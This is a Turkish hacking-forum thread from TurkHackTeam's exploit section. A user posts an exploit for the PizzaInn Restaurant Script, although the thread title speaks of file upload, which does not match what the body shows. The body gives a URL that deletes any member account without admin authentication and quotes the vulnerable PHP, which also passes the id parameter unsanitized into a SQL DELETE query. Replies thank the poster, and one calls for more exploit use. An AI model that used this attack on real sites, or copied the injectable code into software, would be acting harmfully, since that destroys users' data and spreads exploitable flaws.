• Yeni mesajlar

Menü

Giriş yap

---

Navigasyon

Uygulamayı yükle

Yükle

Daha fazla seçenek

Gündüz modu

Bize ulaşın

Kapat Menü

• TurkHackTeam Under Ground
• Exploitler
• Bug Researchers

Çok eski bir web tarayıcısı kullanıyorsunuz. Bu veya diğer siteleri görüntülemekte sorunlar yaşayabilirsiniz..
Tarayıcınızı güncellemeli veya alternatif bir tarayıcı kullanmalısınız.

Restaurant Script (PizzaInn Project) 1.0 - Arbitrary File Upload Exploit -55utd55-

• Konbuyu başlatan 55utd55
• Başlangıç tarihi 19 Haz 2018

55utd55

Uzman üye

14 May 2016

1,540

4

Ram

• 19 Haz 2018

• #1

##############################################################
#Exploit Title: PizzaInn Restaurant Script Project Delete Member Authroization Bypass
#Date: 29.01.2018
#Exploit Author: 55utd55
#Author Web: 55utd55.com
#Author Social: 55utd55_tht
#Software Link: https://sourceforge.net/projects/restaurantmis/
#Tested On: Kali linux 2.0 & Windows 7
#
#Proof Of Concept:
#--------------------------
#1-) Users can be deleted without admin authority.
#2-) The ability to delete members without session control is allowed.
#3-) Users are deleted when url is visited
#http://domain/admin/delete-member.php?id=[member_id]
#
#
#
#delete-member.php
#---------------------------
#
#<?php
# //Start session
# session_start();
#
# //checking connection and connecting to a database
# require_once('connection/config.php');
# //Connect to mysql server
# $link = mysql_connect(DB_HOST, DB_USER, DB_PASSWORD);
# if(!$link) {
# die('Failed to connect to server: ' . mysql_error());
# }
#
# //Select database
# $db = mysql_select_db(DB_DATABASE);
# if(!$db) {
# die("Unable to select database");
# }
#
# // check if the 'id' variable is set in URL
# if (isset($_GET['id']))
# {
# // get id value
# $id = $_GET['id'];
#
# // delete the entry
# $result = mysql_query("DELETE FROM members WHERE member_id='$id'")
# or die("The member does not exist ... \n");
#
# // redirect back to the accounts page
# header("Loca tion: accounts.php");
# }
# else
# // if id isn't set, redirect back to the accounts page
# {
# header("loca tion: accounts.php");
# }
#
# ?>
#################################################################

 

CassPort

Uzman üye

31 Ara 2015

1,592

38

root@cass:~#

• 19 Haz 2018

• #2

Elinize sağlık, işime yarar sanırım

 

Depdip

Uzman üye

20 Ağu 2017

1,578

0

NewYork

• 19 Haz 2018

• #3

Ellerine sağlık

 

jkhacking

Uzman üye

25 Haz 2016

1,607

23

root

• 19 Haz 2018

• #4

Ellerine sağlık

 

M

Mr.00

Uzman üye

14 Mar 2017

1,010

2

Ankara

• 19 Haz 2018

• #5

İşte böyle paylaşımlar lazım Exploit kullanımını artırmamız lazım.

 

Cevap yazmak için giriş yap yada kayıt ol.

Paylaş:

Facebook Twitter Telegram Reddit E-posta Paylaş Link

• TurkHackTeam Under Ground
• Exploitler
• Bug Researchers

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.